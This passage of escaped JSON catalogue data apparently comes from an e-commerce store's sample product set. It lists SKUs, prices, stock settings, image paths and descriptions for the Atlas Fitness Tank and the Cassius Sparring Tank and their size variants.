"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"670\":{\"sku\":\"MT11-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank-XL-Blue\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atlas-fitness-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"671\":{\"sku\":\"MT11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Organic Cotton|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT11-XS-Blue,size=XS,color=Blue|sku=MT11-S-Blue,size=S,color=Blue|sku=MT11-M-Blue,size=M,color=Blue|sku=MT11-L-Blue,size=L,color=Blue|sku=MT11-XL-Blue,size=XL,color=Blue\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Organic Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"672\":{\"sku\":\"MT12-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank-XS-Blue\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassius-sparring-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"673\":{\"sku\":\"MT12-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank-S-Blue\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassius-sparring-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"674\":{\"sku\":\"MT12-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank-M-Blue\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassius-sparring-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"675\":{\"sku\":\"MT12-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank-L-Blue\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassius-sparring-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"676\":{\"sku\":\"MT12-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank-XL-Blue\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassius-sparring-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"677\":{\"sku\":\"MT12\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Cassius Sparring Tank\",\"description\":\"<p>Whether you\'re up against a partner or the clock, the Cassius Sparring Tank is in your corner, moving effortless with your body. The light and loose feel gives you no reason to give up before the bell or the end of the block.<\\/p>\\n<p>&bull; Royal crewneck cotton tank.<br \\/>&bull; Contrast stitching.<br \\/>&bull; Self fabric binding at neckline.<br \\/>&bull; Slim fit.<br \\/>&bull; 96% Merino \\/ 4% LYCRA&reg;.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=LumaTech&trade;|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT12-XS-Blue,size=XS,color=Blue|sku=MT12-S-Blue,size=S,color=Blue|sku=MT12-M-Blue,size=M,color=Blue|sku=MT12-L-Blue,size=L,color=Blue|sku=MT12-XL-Blue,size=XL,color=Blue\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt12-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"LumaTech&trade;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"678\":{\"sku\":\"MP01-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default 